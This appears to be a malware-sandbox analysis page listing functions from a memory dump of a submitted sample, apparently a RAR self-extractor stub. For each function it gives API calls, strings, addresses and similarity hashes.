CAPTION, xrefs: 0069E4BD

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d$tl
API String ID: 2407758923-2316055452
Opcode ID: b4851b2acf73825f378305a14840d70a12056ecc8887a9afb9046bb24eea007f
Instruction ID: fac72f1232306ae3fa54ad569a83d08d9a335a2247a10c88a988d7bae297c92c
Opcode Fuzzy Hash: b4851b2acf73825f378305a14840d70a12056ecc8887a9afb9046bb24eea007f
Instruction Fuzzy Hash: 0A819071208311AFD710DFA8CD89E6BBBEEFB89714F04092DFA8497250D671E905CB52

Function 006BCB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 006BCB66

Part of subcall function 006BC701: _free.LIBCMT ref: 006BC71E
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC730
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC742
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC754
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC766
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC778
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC78A
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC79C
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC7AE
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC7C0
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC7D2
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC7E4
Part of subcall function 006BC701: _free.LIBCMT ref: 006BC7F6

_free.LIBCMT ref: 006BCB5B

Part of subcall function 006B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34), ref: 006B8DE2
Part of subcall function 006B8DCC: GetLastError.KERNEL32(006C3A34,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34,006C3A34), ref: 006B8DF4

_free.LIBCMT ref: 006BCB7D
_free.LIBCMT ref: 006BCB92
_free.LIBCMT ref: 006BCB9D
_free.LIBCMT ref: 006BCBBF
_free.LIBCMT ref: 006BCBD2
_free.LIBCMT ref: 006BCBE0
_free.LIBCMT ref: 006BCBEB
_free.LIBCMT ref: 006BCC23
_free.LIBCMT ref: 006BCC2A
_free.LIBCMT ref: 006BCC47
_free.LIBCMT ref: 006BCC5F

Strings

hl, xrefs: 006BCC0E

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: hl
API String ID: 161543041-974249556
Opcode ID: 450b9fc15d6d84872853c3808d65dd2a6bc4f4dc1f35c03898d57de605622665
Instruction ID: 3c495a4f6bece117ab23c84a3d3e570b0c0b24b2e6cf3d0e21dac1eae8d6d487
Opcode Fuzzy Hash: 450b9fc15d6d84872853c3808d65dd2a6bc4f4dc1f35c03898d57de605622665
Instruction Fuzzy Hash: 63314DB16002059FEB61AA38D846BDAB7EAEF50320F50542EF148D7292DF31AEC0CB14

Function 006B96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 006B9705

Part of subcall function 006B8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34), ref: 006B8DE2
Part of subcall function 006B8DCC: GetLastError.KERNEL32(006C3A34,?,006BC896,006C3A34,00000000,006C3A34,00000000,?,006BC8BD,006C3A34,00000007,006C3A34,?,006BCCBA,006C3A34,006C3A34), ref: 006B8DF4

_free.LIBCMT ref: 006B9711
_free.LIBCMT ref: 006B971C
_free.LIBCMT ref: 006B9727
_free.LIBCMT ref: 006B9732
_free.LIBCMT ref: 006B973D
_free.LIBCMT ref: 006B9748
_free.LIBCMT ref: 006B9753
_free.LIBCMT ref: 006B975E
_free.LIBCMT ref: 006B976C

Strings

0dl, xrefs: 006B96FC

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0dl
API String ID: 776569668-2663366482
Opcode ID: 937da8c3be99d57c50b238d23a028120ea5a84e4df6f6c9dd6b042434dbe4116
Instruction ID: be1c0e073ccca2f095bd868ad1670a33fc22d791a973af12f6bdbbe67c17bfb4
Opcode Fuzzy Hash: 937da8c3be99d57c50b238d23a028120ea5a84e4df6f6c9dd6b042434dbe4116
Instruction Fuzzy Hash: 4A11A7B6110109AFCB41EF54C842DD93BBAEF14350B9154AAFA084F262DE32DA90DF98

Function 006A9711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 006A9736
_wcslen.LIBCMT ref: 006A97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 006A97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 006A9806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 006A982D

Strings

<html>, xrefs: 006A9755, 006A978E
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 006A9760
utf-8"></head>, xrefs: 006A976B
</html>, xrefs: 006A97B7

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-4209811716
Opcode ID: 78b499a6d2534a0d6113b48ad4c148a7c08b3904808309e6b8e955624fb42b29
Instruction ID: db5c6fe93b622a898db71abee86d1a41504d3cebdccc8a0b57515616480ef075
Opcode Fuzzy Hash: 78b499a6d2534a0d6113b48ad4c148a7c08b3904808309e6b8e955624fb42b29
Instruction Fuzzy Hash: 0D3137722083117AE725BB249C06FEB779ADF93310F24051EF402962D2EB64DE4587B9

Function 006AD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 006AD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 006AD6ED

Part of subcall function 006A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0069C116,00000000,.exe,?,?,00000800,?,?,?,006A8E3C), ref: 006A1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 006AD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 006AD720
GetObjectW.GDI32(00000000,00000018,?), ref: 006AD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 006AD75D
DeleteObject.GDI32(00000000), ref: 006AD764
GetWindow.USER32(00000000,00000002), ref: 006AD76D

Strings

STATIC, xrefs: 006AD6F3

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 1481f710c73713d230ba80bd1beed693222d9830123ebdee5d1aeca54c9dc292
Instruction ID: 1b51dec174785b983955f95a24e08632ba9c4c3d9db12ff9acffdb2025d1d2f4
Opcode Fuzzy Hash: 1481f710c73713d230ba80bd1beed693222d9830123ebdee5d1aeca54c9dc292
Instruction Fuzzy Hash: 621124325003207BE321BBB09C4AFBF765FAF42711F004116FA52A2291DB64CF458AA9

Function 006B2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006B2F50
___TypeMatch.LIBVCRUNTIME ref: 006B305E
_UnwindNestedFrames.LIBCMT ref: 006B31B0
CallUnexpected.LIBVCRUNTIME ref: 006B31CB
_abort.LIBCMT ref: 006B31D0

Strings

csm, xrefs: 006B2E6E
csm, xrefs: 006B2F87
csm, xrefs: 006B2EDB

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: d5adfc8d59dca11518b5dcd9dc2bc5c3633e2fb399248bdd2dc848d35c372911
Instruction ID: 11cfb712b626a689d87eb71db60f6b23a280048cc55592c61125895e6a88f596
Opcode Fuzzy Hash: d5adfc8d59dca11518b5dcd9dc2bc5c3633e2fb399248bdd2dc848d35c372911
Instruction Fuzzy Hash: 59B15CB1A00219EFCF25EFA8C8919EEB7BAFF14310F144159E8156B312D731DA91CB95

Function 0069AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0069AF29

Strings

Windows 10, xrefs: 0069B0C2
Name, xrefs: 0069B0B0
ROOT\CIMV2, xrefs: 0069AF5C
WQL, xrefs: 0069AFDC
nj, xrefs: 0069AFC0
SELECT * FROM Win32_OperatingSystem, xrefs: 0069AFCA

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$nj
API String ID: 3519838083-1590877620
Opcode ID: dcccd991c2314a98f87ca77c39d597062c70090d131b341aa3e681817d21b6fa
Instruction ID: ebf614e3297fd20a4dd877840883c0d3825051087c11235598826010dcb80908
Opcode Fuzzy Hash: dcccd991c2314a98f87ca77c39d597062c70090d131b341aa3e681817d21b6fa
Instruction Fuzzy Hash: D6714A71A00229AFDF14DFA4D895DBEB7BAFF49710B14415DE512A77A0CB30AE42CB60

Function 00696FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00696FAA
_wcslen.LIBCMT ref: 00697013
_wcslen.LIBCMT ref: 00697084

Part of subcall function 00697A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00697AAB
Part of subcall function 00697A9C: GetLastError.KERNEL32 ref: 00697AF1
Part of subcall function 00697A9C: CloseHandle.KERNEL32(?), ref: 00697B00

Strings

UNC\, xrefs: 00697051
SeCreateSymbolicLinkPrivilege, xrefs: 00696FCC
SeRestorePrivilege, xrefs: 00696FC2
\??\, xrefs: 0069702B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: f00d023a9d5d9a4f06630172210a54d5fbf94261a91b65d0b1ab2896d73bcc18
Instruction ID: cc85cc6dde7c7933f8dc9c87d80f8286795c4118ebb72b62dcfba00ab2b9ebb9
Opcode Fuzzy Hash: f00d023a9d5d9a4f06630172210a54d5fbf94261a91b65d0b1ab2896d73bcc18
Instruction Fuzzy Hash: B04159B1D18344BAEF30EB709C82FEE776F9F05300F04445AFA45A7682D674AA848735

Function 006AB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00691316: GetDlgItem.USER32(00000000,00003021), ref: 0069135A
Part of subcall function 00691316: SetWindowTextW.USER32(00000000,006C35F4), ref: 00691370

EndDialog.USER32(?,00000001), ref: 006AB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 006AB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 006AB650
SetWindowTextW.USER32(?,?), ref: 006AB661
GetDlgItem.USER32(?,00000065), ref: 006AB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 006AB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 006AB694

Strings

LICENSEDLG, xrefs: 006AB5D4

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 912477e10287b0f6eb714a0b37d8140dfb10d3e1de3ca0553958c4aba6a5c128
Instruction ID: b55e8ba76b8a0b782b845955d0f36f1f1eddd986fb06cf2d2dfa46274e009727
Opcode Fuzzy Hash: 912477e10287b0f6eb714a0b37d8140dfb10d3e1de3ca0553958c4aba6a5c128
Instruction Fuzzy Hash: 9A21B132200215BBD311AF66EC49FBB3B6FEB4BB45F117019F601962A2CF529D01DA39

Function 006AFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,8A5ADCA3,00000001,00000000,00000000,?,?,0069AF6C,ROOT\CIMV2), ref: 006AFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0069AF6C,ROOT\CIMV2), ref: 006AFE14
SysAllocString.OLEAUT32(00000000), ref: 006AFE1F
_com_issue_error.COMSUPP ref: 006AFE48
_com_issue_error.COMSUPP ref: 006AFE52
GetLastError.KERNEL32(80070057,8A5ADCA3,00000001,00000000,00000000,?,?,0069AF6C,ROOT\CIMV2), ref: 006AFE57
_com_issue_error.COMSUPP ref: 006AFE6A
GetLastError.KERNEL32(00000000,?,?,0069AF6C,ROOT\CIMV2), ref: 006AFE80
_com_issue_error.COMSUPP ref: 006AFE93

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 03a10a2b1fad92fd0bdba1b6b080cda0d6bdf403726122e999a5309603b0c1fb
Instruction ID: ec0dd69f3dd982da3dd68e0d60cf3aac51cfbaa0fd3cf8709be29499e75bbaf9
Opcode Fuzzy Hash: 03a10a2b1fad92fd0bdba1b6b080cda0d6bdf403726122e999a5309603b0c1fb
Instruction Fuzzy Hash: C241C4B1A00215ABCB10AFA9C845BEEBBAAFF45710F14423EF905E7351D7359D408BA6

Function 00699382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00699387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 006993AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 006993C9

Part of subcall function 0069C29A: _wcslen.LIBCMT ref: 0069C2A2

Part of subcall function 006A1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0069C116,00000000,.exe,?,?,00000800,?,?,?,006A8E3C), ref: 006A1FD1

_swprintf.LIBCMT ref: 00699465

Part of subcall function 00694092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006940A5

MoveFileW.KERNEL32(?,?), ref: 006994D4
MoveFileW.KERNEL32(?,?), ref: 00699514

Strings

rtmp%d, xrefs: 0069944E

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 699c76887eb549bf1abc6b470b1b8aa17e884d4af97a586998eba92ca4082f5a
Instruction ID: 3fc765ecd64bcc18af993e170e27823aee463df098b3e79b611315a706a69ac6
Opcode Fuzzy Hash: 699c76887eb549bf1abc6b470b1b8aa17e884d4af97a586998eba92ca4082f5a
Instruction Fuzzy Hash: EA4193B1900258A6DF61ABA4CD45EEF737EAF41740F0088ADB649E3551DA388B898F74

Function 00691100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0069112B
_wcslen.LIBCMT ref: 00691153
_wcslen.LIBCMT ref: 00691182
_wcslen.LIBCMT ref: 006911A9

Strings

pj, xrefs: 00691205, 00691233
zj, xrefs: 00691219
Uj, xrefs: 0069120D, 0069123B

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: _wcslen
String ID: Uj$pj$zj
API String ID: 176396367-2751604692
Opcode ID: 61f65a0a045debe2c31c5c7d4d2c68275f787bae06747399d4d6d129b023684c
Instruction ID: 2fbb68148d34bc6ae7d2e68b8bfe744b67d02e3c9a346a28915fb6b1262bff32
Opcode Fuzzy Hash: 61f65a0a045debe2c31c5c7d4d2c68275f787bae06747399d4d6d129b023684c
Instruction Fuzzy Hash: 99419471A0066A5BDB61AF688C469EE7BBDEF01310F10401EF945E7345DE30AE858BA4

Function 006A9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 006A9EEE
GetWindowRect.USER32(?,00000000), ref: 006A9F44
ShowWindow.USER32(?,00000005,00000000), ref: 006A9FDB
SetWindowTextW.USER32(?,00000000), ref: 006A9FE3
ShowWindow.USER32(00000000,00000005), ref: 006A9FF9

Strings

RarHtmlClassName, xrefs: 006A9FA5
j, xrefs: 006A9F52, 006A9F87

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Window$Show$RectText
String ID: j$RarHtmlClassName
API String ID: 3937224194-1905727271
Opcode ID: 55db899b509010772dde9c9d5d3f1309ec31750c8d65778650467d0e342b1d56
Instruction ID: f6c05268faf5c585ba27a2737a8a4484e9538b392fa7854d6382fc883748b443
Opcode Fuzzy Hash: 55db899b509010772dde9c9d5d3f1309ec31750c8d65778650467d0e342b1d56
Instruction Fuzzy Hash: 6E41E271004320AFCB21AFA8DC48BABBBAAFF49705F104559F80999256DB34DD05CF65

Function 006A1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 006A122E

Part of subcall function 0069B146: GetVersionExW.KERNEL32(?), ref: 0069B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 006A1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 006A1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 006A1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 006A1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 006A1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 006A12CF
__aullrem.LIBCMT ref: 006A1379

Memory Dump Source

Source File: 00000000.00000002.2140699046.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2140681121.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140728130.00000000006C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140743904.00000000006F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2140791273.00000000006F3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_4t8f8F3uT1.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
